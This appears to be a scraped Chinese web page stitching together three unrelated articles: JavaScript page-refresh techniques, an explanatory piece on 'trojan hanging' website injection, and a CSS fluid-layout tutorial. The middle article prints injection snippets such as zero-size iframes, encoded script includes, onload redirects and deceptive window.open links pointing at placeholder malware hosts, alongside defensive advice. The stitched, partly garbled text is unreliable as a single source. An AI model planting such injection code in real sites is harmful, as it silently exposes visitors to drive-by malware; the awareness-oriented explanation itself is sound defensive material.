整合營(yíng)銷服務(wù)商
電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理
免費(fèi)咨詢熱線:
電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理
免費(fèi)咨詢熱線:
。 reload
reload 方法,該方法強(qiáng)迫瀏覽器刷新當(dāng)前頁(yè)面。
語(yǔ)法:location.reload([bForceGet])
參數(shù): bForceGet, 可選參數(shù), 默認(rèn)為 false,從客戶端緩存里取當(dāng)前頁(yè)。true, 則以 GET 方式,從服務(wù)端取最新的頁(yè)面, 相當(dāng)于客戶端點(diǎn)擊 F5("刷新")
reload() 方法用于重新加載當(dāng)前文檔。
如果該方法沒(méi)有規(guī)定參數(shù),或者參數(shù)是 false,它就會(huì)用 HTTP 頭 If-Modified-Since 來(lái)檢測(cè)服務(wù)器上的文檔是否已改變。如果文檔已改變,reload() 會(huì)再次下載該文檔。如果文檔未改變,則該方法將從緩存中裝載文檔。這與用戶單擊瀏覽器的刷新按鈕的效果是完全一樣的。
2.
2,replace 方法,該方法通過(guò)指定URL替換當(dāng)前緩存在歷史里(客戶端)的項(xiàng)目,因此當(dāng)使用replace方法之后,你不能通過(guò)“前進(jìn)”和“后退”來(lái)訪問(wèn)已經(jīng)被替換的URL。
語(yǔ)法: location.replace(URL)
通常使用: location.reload() 或者是 history.go(0) 來(lái)做。
此方法類似客戶端點(diǎn)F5刷新頁(yè)面,所以頁(yè)面method="post"時(shí),會(huì)出現(xiàn)"網(wǎng)頁(yè)過(guò)期"的提示。
因?yàn)镾ession的安全保護(hù)機(jī)制。
當(dāng)調(diào)用 location.reload() 方法時(shí), aspx頁(yè)面此時(shí)在服務(wù)端內(nèi)存里已經(jīng)存在, 因此必定是 IsPostback 的。
如果有這種應(yīng)用: 需要重新加載該頁(yè)面,也就是說(shuō)期望頁(yè)面能夠在服務(wù)端重新被創(chuàng)建,期望是 Not IsPostback 的。
這里,location.replace() 就可以完成此任務(wù)。被replace的頁(yè)面每次都在服務(wù)端重新生成。
代碼: location.replace(location.href);
返回并刷新頁(yè)面:
location.replace(document.referrer);
document.referrer //前一個(gè)頁(yè)面的URL
不要用 history.go(-1),或 history.back();來(lái)返回并刷新頁(yè)面,這兩種方法不會(huì)刷新頁(yè)面。
附:
Javascript刷新頁(yè)面的幾種方法:
復(fù)制代碼 代碼如下:
1,history.go(0)
2,location.reload()
3,location=location
4,location.assign(location)
5,document.execCommand('Refresh')
6,window.navigate(location)
7,location.replace(location)
8,document.URL=location.href
自動(dòng)刷新頁(yè)面的方法:
1,頁(yè)面自動(dòng)刷新:把如下代碼加入<head>區(qū)域中
復(fù)制代碼 代碼如下:
<meta http-equiv="refresh" content="20">
其中20指每隔20秒刷新一次頁(yè)面.
2,頁(yè)面自動(dòng)跳轉(zhuǎn):把如下代碼加入<head>區(qū)域中
復(fù)制代碼 代碼如下:
<meta http-equiv="refresh" content="20;url=http://www.jb51.net">
其中20指隔20秒后跳轉(zhuǎn)到http://www.jb51.net頁(yè)面
3,頁(yè)面自動(dòng)刷新js版
復(fù)制代碼 代碼如下:
<script language="JavaScript">
function myrefresh()
{
window.location.reload();
}
setTimeout('myrefresh()',1000); //指定1秒刷新一次
</script>
4,JS刷新框架的腳本語(yǔ)句
復(fù)制代碼 代碼如下:
//刷新包含該框架的頁(yè)面用
<script language=JavaScript>
parent.location.reload();
</script>
//子窗口刷新父窗口
<script language=JavaScript>
self.opener.location.reload();
</script>
( 或 <a href="javascript:opener.location.reload()">刷新</a> )
//刷新另一個(gè)框架的頁(yè)面用
<script language=JavaScript>
parent.另一FrameID.location.reload();
</script>
如果想關(guān)閉窗口時(shí)刷新或想開(kāi)窗時(shí)刷新,在<body>中調(diào)用以下語(yǔ)句即可。
復(fù)制代碼 代碼如下:
<body onload="opener.location.reload()"> 開(kāi)窗時(shí)刷新
<body onUnload="opener.location.reload()"> 關(guān)閉時(shí)刷新
<script language="javascript">
window.opener.document.location.reload()
</script>
一、先來(lái)看一個(gè)簡(jiǎn)單的例子:
下面以三個(gè)頁(yè)面分別命名為frame.html、top.html、bottom.html為例來(lái)具體說(shuō)明如何做。
frame.html 由上(top.html)下(bottom.html)兩個(gè)頁(yè)面組成,代碼如下:
復(fù)制代碼 代碼如下:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> frame </TITLE>
</HEAD>
<frameset rows="50%,50%">
<frame name=top src="top.html">
<frame name=bottom src="bottom.html">
</frameset>
</HTML>
現(xiàn)在假設(shè)top.html (即上面的頁(yè)面) 有七個(gè)button來(lái)實(shí)現(xiàn)對(duì)bottom.html (即下面的頁(yè)面) 的刷新,可以用以下七種語(yǔ)句,哪個(gè)好用自己看著辦了。
top.html 頁(yè)面的代碼如下:
復(fù)制代碼 代碼如下:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> top.html </TITLE>
</HEAD>
<BODY>
<input type=button value="刷新1" onclick="window.parent.frames[1].location.reload()"><br>
<input type=button value="刷新2" onclick="window.parent.frames.bottom.location.reload()"><br>
<input type=button value="刷新3" onclick="window.parent.frames['bottom'].location.reload()"><br>
<input type=button value="刷新4" onclick="window.parent.frames.item(1).location.reload()"><br>
<input type=button value="刷新5" onclick="window.parent.frames.item('bottom').location.reload()"><br>
<input type=button value="刷新6" onclick="window.parent.bottom.location.reload()"><br>
<input type=button value="刷新7" onclick="window.parent['bottom'].location.reload()"><br>
</BODY>
</HTML>
下面是bottom.html頁(yè)面源代碼,為了證明下方頁(yè)面的確被刷新了,在裝載完頁(yè)面彈出一個(gè)對(duì)話框。
復(fù)制代碼 代碼如下:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> bottom.html </TITLE>
</HEAD>
<BODY onload="alert('我被加載了!')">
<h1>This is the content in bottom.html.</h1>
</BODY>
</HTML>
解釋一下:
復(fù)制代碼 代碼如下:
1.window指代的是當(dāng)前頁(yè)面,例如對(duì)于此例它指的是top.html頁(yè)面。
2.parent指的是當(dāng)前頁(yè)面的父頁(yè)面,也就是包含它的框架頁(yè)面。例如對(duì)于此例它指的是framedemo.html。
3.frames是window對(duì)象,是一個(gè)數(shù)組。代表著該框架內(nèi)所有子頁(yè)面。
4.item是方法。返回?cái)?shù)組里面的元素。
5.如果子頁(yè)面也是個(gè)框架頁(yè)面,里面還是其它的子頁(yè)面,那么上面的有些方法可能不行。
附:
Javascript刷新頁(yè)面的幾種方法:
1 history.go(0)
2 location.reload()
3 location=location
4 location.assign(location)
5 document.execCommand('Refresh')
6 window.navigate(location)
7 location.replace(location)
8 document.URL=location.href
二、自動(dòng)刷新頁(yè)面
1.頁(yè)面自動(dòng)刷新:把如下代碼加入<head>區(qū)域中
<meta http-equiv="refresh" content="20">
其中20指每隔20秒刷新一次頁(yè)面.
2.頁(yè)面自動(dòng)跳轉(zhuǎn):把如下代碼加入<head>區(qū)域中
<meta http-equiv="refresh" content="20;url=http://www.jb51.net">
其中20指隔20秒后跳轉(zhuǎn)到http://www.jb51.net頁(yè)面
3.頁(yè)面自動(dòng)刷新js版
[Ctrl+A 全選 注:如需引入外部Js需刷新才能執(zhí)行]
三、java在寫Servler,Action等程序時(shí),要操作返回頁(yè)面的話(如談出了窗口,操作完成以后,關(guān)閉當(dāng)前頁(yè)面,刷新父頁(yè)面)
復(fù)制代碼 代碼如下:
1 PrintWriter out = response.getWriter();
2 out.write("<script type=\"text/javascript\">");
3 ////子窗口刷新父窗口
4 out.write("self.opener.location.reload();");
5 //關(guān)閉窗口
6 out.write("window.opener=null;");
7 out.write("window.close();");
8 out.write("</script>");
四、JS刷新框架的腳本語(yǔ)句
1.如何刷新包含該框架的頁(yè)面用
復(fù)制代碼 代碼如下:
<script language=JavaScript>
parent.location.reload();
</script>
所謂的掛馬,就是黑客通過(guò)各種手段,包括SQL注入,網(wǎng)站敏感文件掃描,服務(wù)器漏洞,網(wǎng)站程序0day, 等各種方法獲得網(wǎng)站管理員賬號(hào),然后登陸網(wǎng)站后臺(tái),通過(guò)數(shù)據(jù)"庫(kù)備份/恢復(fù)"或者上傳漏洞獲得一個(gè)webshell。利用獲得的webshell修改網(wǎng)站頁(yè)面的內(nèi)容,向頁(yè)面中加入惡意轉(zhuǎn)向代碼。也可以直接通過(guò)弱口令獲得服務(wù)器或者網(wǎng)站FTP,然后直接對(duì)網(wǎng)站頁(yè)面直接進(jìn)行修改。當(dāng)你訪問(wèn)被加入惡意代碼的頁(yè)面時(shí),你就會(huì)自動(dòng)的訪問(wèn)被轉(zhuǎn)向的地址或者下載木馬病毒。下面就讓我們來(lái)看看幾種常見(jiàn)的掛馬網(wǎng)站。
(1)iframe 框架掛馬
在網(wǎng)頁(yè)上增加一行掛馬的程序,例如:
<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>
這種嵌入是的掛馬非常常見(jiàn),在Google中搜索發(fā)現(xiàn)的可能還有木馬的網(wǎng)頁(yè),一般都是被這種方式掛馬。這行語(yǔ)句就是在網(wǎng)頁(yè)打開(kāi)的時(shí)候,同時(shí)打開(kāi)另外一個(gè)網(wǎng)頁(yè),當(dāng)然這個(gè)網(wǎng)頁(yè)可能包含大量的木馬,也可能僅僅是為了騙取流量。
如果我們的網(wǎng)頁(yè)不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網(wǎng)頁(yè)被iframe掛馬,也不會(huì)傷害到訪問(wèn)網(wǎng)站的用戶。
【原理】:
IE5及其以后版本支持在CSS中使用expression,用來(lái)把CSS屬性和javascript腳本關(guān)聯(lián)起來(lái),這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。
我們?cè)诰W(wǎng)頁(yè)中增加如下的代碼即可屏蔽iframe屬性:
<style type=”text/css”>
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
</style>
iframe 也可以采用加密的方式掛馬,例如下面的代碼:
<iframe src=http://google-analitecs.com/in.cgi????? width=1 height=1></iframe>
(2)script 掛馬
通過(guò)script的調(diào)用來(lái)掛馬,可以掛直接的html文件,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬(wàn)別,主要方式如下:
<script src=http://%11%11%11%11%11%11%11></script>
這是一個(gè)加密的掛馬語(yǔ)句;
2.1 htm文件掛馬:
通過(guò)上傳一個(gè)木馬文件(x.htm)掛馬,代碼如下:
document.write(“<div style=’display:none’>”)
document.write(“<iframe src=x.htm width=0 height=0></iframe>”)
document.write(“</div>”)
htm 掛馬代碼:
<script src=x.htm></script>
2.2 js文件掛馬
通過(guò)上傳一個(gè)木馬文件(x.js)掛馬,代碼如下:
document.write(“<iframe width=’0′ height=’0′ src=’http://xxx.com/xxx.htm’></iframe>”);
JS掛馬代碼:
<script language=javascript src=x.js></script>
當(dāng)然也可以掛互聯(lián)網(wǎng)上任何一臺(tái)機(jī)器的x.js文件;
2.3 js變形加密
<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/x.x></script>
(3)圖片偽裝掛馬
隨著防毒技術(shù)的發(fā)展,圖片木馬技術(shù)逃避殺毒監(jiān)視的新技術(shù),攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文
件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調(diào)用執(zhí)行,是比較新穎的一種掛馬隱蔽方法,實(shí)例代碼如:
<html>
<iframe src=”http://www.x.com/x.htm” height=0 width=0></iframe>
<img src=http://m.jungjaehyung.com/uploadfile/2024/0808/20240808042614744.jpg”></center>
</html>
當(dāng)用戶打開(kāi)http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網(wǎng)頁(yè)代碼也隨之運(yùn)行。
(4)其它的掛馬方式
4.1 body掛馬
<body onload=”window.location=’http://xxx.com/xxx.htm’;”></body>
也可以在css的body中掛馬
body {
background-image: url(‘javascript:document.write(“<script src=http://www.xxx.com/x.js></script>”)’)}
4.2 隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML +
‘\r\n<iframe src=”http://www.xxx.com/xxx.htm/”></iframe>’;
4.3 java的open函數(shù)掛馬
直接調(diào)用:
<SCRIPT language=javascript>
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
</script>
欺騙調(diào)用:
<a href=”http://www.a.com(迷惑連接地址,顯示這個(gè)地址指向木馬地址)” onMouseOver=”www_a_com(); return true;”> 頁(yè)面要顯示的內(nèi)容 </a>
<SCRIPT Language=”JavaScript”>
function www_a_com ()
{
var url=”網(wǎng)馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
</SCRIPT>
4.4 偽裝調(diào)用:
<frameset rows=”444,0″ cols=”*”>
<frame src=”a.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”b.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>
形形色色的網(wǎng)頁(yè)掛馬,代碼都十分簡(jiǎn)單,所以,互聯(lián)網(wǎng)木馬想要傳播,就會(huì)不停的開(kāi)發(fā)新的掛馬方式,不停的加密隱藏自己,這樣才能逃過(guò)各種安全軟件的眼睛。其實(shí),看看上文,很多語(yǔ)句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網(wǎng)頁(yè)掛馬的原理和方法,再防范網(wǎng)頁(yè)掛馬就容易多了。
帶木馬的網(wǎng)頁(yè)主要包括兩種類型:一種自己本身就是木馬網(wǎng)站,所有的頁(yè)面都有木馬,另一種是正常的網(wǎng)站,由于管理不善,被掛馬,成為木馬網(wǎng)站的一個(gè)中轉(zhuǎn)站,看看google中這樣的網(wǎng)站何其多,可能很多站長(zhǎng)現(xiàn)在還不知道,呵呵,多學(xué)習(xí)學(xué)習(xí)吧,站長(zhǎng)可不是那么好當(dāng)?shù)摹?/p>
不過(guò),僅僅有了網(wǎng)絡(luò)掛馬的代碼,也不一定一定能傳播木馬,只要我們加強(qiáng)防范,不讓我們的網(wǎng)頁(yè)被 掛馬,甚至,即使被掛馬了,打開(kāi)了木馬網(wǎng)頁(yè),我們的系統(tǒng)沒(méi)有漏洞,木馬網(wǎng)頁(yè)也同樣不能發(fā)揮作用的。所以,最重要的安全防范方式就是定期給系統(tǒng)打補(bǔ)丁,幾乎 所有的木馬網(wǎng)頁(yè)都無(wú)法發(fā)揮作用了。
PC端進(jìn)行網(wǎng)頁(yè)制作時(shí),經(jīng)常使用固定像素并且內(nèi)容居中的網(wǎng)頁(yè)布局,為了適應(yīng)小屏幕的設(shè)備,在移動(dòng)設(shè)備和跨平臺(tái)(響應(yīng)式)網(wǎng)頁(yè)開(kāi)發(fā)過(guò)程中,多數(shù)使用流式布局,下面我們就對(duì)流式布局進(jìn)行詳細(xì)介紹。
流式布局是一種等比例縮放布局方式,在CSS代碼中使用百分比來(lái)設(shè)置寬度,也稱百分比自適應(yīng)的布局。 流式布局實(shí)現(xiàn)方法是將CSS固定像素寬度換算為百分比寬度。換算公式如下: 目標(biāo)元素寬度/父盒子寬度=百分?jǐn)?shù)寬度 下面通過(guò)一個(gè)案例來(lái)演示固定布局如何轉(zhuǎn)換為百分比布局,如demo4-1.html 所示。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>固定布局轉(zhuǎn)換為百分比布局</title>
<style type="text/css">
body>*{ width: 980px; height:auto; margin:0 auto;
margin-top:10px;
border:1px solid #000; padding:5px;}
header{ height:50px;}
section{ height: 300px;}
footer{ height:30px;}
section>*{ height:100%; border:1px solid #000; float:left;}
aside{ width:250px;}
article{ width:700px; margin-left:10px;}
</style>
</head>
<body>
<header>header</header>
<nav>nav</nav>
<section>
<aside>aside</aside>
<article>article</article>
</section>
<footer> footer</footer>
</body>
</html>
打開(kāi)Chrome瀏覽器訪問(wèn)demo4-1.html,頁(yè)面效果如下圖所示。
可以嘗試改變?yōu)g覽器窗口的大小,頁(yè)面元素的大小不會(huì)隨瀏覽器窗口改變,如下圖所示。
下面修改demo4-1樣式代碼,將所有寬度修改為百分比的形式,具體如下:
<style type="text/css">
body>*{ width:95%; height:auto; margin:0 auto; margin-top:10px;
border:1px solid #000; padding :5px; }
header{ height:50px; }
section{ height: 300px; }
footer{ height:30px;}
section>*{ height:100%; border:1px solid #000; float:left; }
aside{ width:25.510204%; /*250÷980*/}
article{ width: 71.428571%; /*700÷980*/margin-left:1.0204088%;}
</style>
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。
